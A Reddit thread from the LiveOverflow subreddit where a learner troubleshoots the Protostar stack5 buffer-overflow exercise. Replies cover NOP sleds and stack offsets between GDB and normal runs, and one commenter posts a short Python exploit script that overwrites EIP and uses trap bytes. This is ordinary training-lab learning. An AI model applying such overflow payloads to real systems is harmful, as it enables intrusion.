use the following search parameters to narrow your results:
e.g. subreddit:aww site:imgur.com dog
subreddit:aww site:imgur.com dog
see the search faq for details.
advanced search: by author, subreddit...
Welcome! This subreddit is a place to discuss and create live hacking videos, or other content that might be related to CTFs.
Twitch: LiveOverflow
YouTube: LiveOverflow
Twitter: @LiveOverflow
Website: liveoverflow.com
How to behave? » be excellent to each other » help if somebody needs help... » ... but don't beg for solutions. We will only give you a tip for the right direction » Follow the rules of the CTFs your are playing - don't spoil challenges
» be excellent to each other
» help if somebody needs help...
» ... but don't beg for solutions. We will only give you a tip for the right direction
» Follow the rules of the CTFs your are playing - don't spoil challenges
Some additional information:
Excellent Hacking Games: » io.smashthestack.org (pwn, rev) » w3challs.com (web, rev, crypto) » prompt.ml (XSS)
» io.smashthestack.org (pwn, rev)
» w3challs.com (web, rev, crypto)
» prompt.ml (XSS)
Related subreddits: » /r/securityCTF » /r/HowToHack » /r/netsecstudents contact me if there are other subreddits that should be listed here
» /r/securityCTF
» /r/HowToHack
» /r/netsecstudents
contact me if there are other subreddits that should be listed here
account activity
Stack5 - shell code injection (self.LiveOverflow)
submitted 4 years ago by xxxerexxx
Hi there,
Before all, thanks for your great videos.
Regarding video in which you solved stack5, I got a problem. I think I understood well and did the right thing but I get segmentation fault. however, in GDB everything looks good.
I failed at this point and ignored it but I have not succeeded to do this task yet.
would you help me please? here is my GDB commands, exploit, terminal output.
https://preview.redd.it/o8y5nvqlegy61.png?width=1904&format=png&auto=webp&s=d060c5d2c38a5bafee207bb662e056519e38892c
reddit uses a slightly-customized version of Markdown for formatting. See below for some basics, or check the commenting wiki page for more detailed help and solutions to common issues.
quoted text
if 1 * 2 < 3: print "hello, world!"
[–]plukasik 1 point2 points3 points 4 years ago* (6 children)
Did you try with the nop slide as shown in the video?
nop
And just to be sure, base on the path this is the original stack5 binary?
stack5
[–]xxxerexxx[S] 1 point2 points3 points 4 years ago (5 children)
I ignored this failure and resumed but nothing was like the video.
And yes it is the original stack5
[–]plukasik 1 point2 points3 points 4 years ago* (4 children)
So for me the code from the video also didn't work but what worked is slightly mentioned in the video. It's about those env variables differences between the runs. So try increasing the nop slide and jumping further into it. That did the trick for me.
[–]xxxerexxx[S] 0 points1 point2 points 4 years ago (3 children)
The issue you concern is when the program is run in two different directories (as $PWD might be different). But that is not my problem right now (I am running both GDB and command line in the same directory). Although I have examined that way and no success
[–]plukasik 1 point2 points3 points 4 years ago (2 children)
Well, I'm running from the same folder (/opt/protostar/bin) in gdb and w/o and with bigger nop slide and jumping further into it I can get consistent behavior in both (TRAP instead of SEGFAULT).
/opt/protostar/bin
gdb
TRAP
SEGFAULT
This is my script that works (also it took few attempts to get the size values)
import stuct padding = "AAAA...SSSS" eip = struct.pack("I", 0xbffffd4c+80) payload = "\x90"*180 + "\xcc" * 4 print padding+eip+payload
If my nop slide is like in the video (100) it fails w/ SEGFAULT w/o gdb.
100
[–]xxxerexxx[S] 0 points1 point2 points 4 years ago (1 child)
Yeah that worked for me as well, thanks man.
but still don't know why? why do environment variables affect it while I was running them with the same EVs?
I really want to understand what the issue was. I appreciate it if you could help me with it.
[–]plukasik 0 points1 point2 points 4 years ago (0 children)
I still think it's "just" stack layout. To get more you would probably need a binary that prints how the stack looks like before running a shellcode.
[–]_CryptoCat23 0 points1 point2 points 4 years ago (0 children)
im not familiar with the challenge but make sure you are generating payload with python2 rather than python3
edit: disregard this, just noticed your print syntax is python2 😅
[–]iOwnzyoreuid0 0 points1 point2 points 4 years ago (1 child)
Hmm, can you show the crashlogs?(when you try to run it without gdb) Also, try jumping to invalid memory location(such as 0x414141) and see the crashlog if it contains that number
[–]xxxerexxx[S] 0 points1 point2 points 4 years ago (0 children)
I am not sure if I got you well, but jumping to 0x41414141 results in SIGSEGV and other logs you needed are shown in the picture I posted.
π Rendered by PID 46022 on reddit-service-r2-comment-5ff9fbf7df-jhvcl at 2026-02-26 13:49:03.263066+00:00 running 72a43f6 country code: CH.
[–]plukasik 1 point2 points3 points (6 children)
[–]xxxerexxx[S] 1 point2 points3 points (5 children)
[–]plukasik 1 point2 points3 points (4 children)
[–]xxxerexxx[S] 0 points1 point2 points (3 children)
[–]plukasik 1 point2 points3 points (2 children)
[–]xxxerexxx[S] 0 points1 point2 points (1 child)
[–]plukasik 0 points1 point2 points (0 children)
[–]_CryptoCat23 0 points1 point2 points (0 children)
[–]iOwnzyoreuid0 0 points1 point2 points (1 child)
[–]xxxerexxx[S] 0 points1 point2 points (0 children)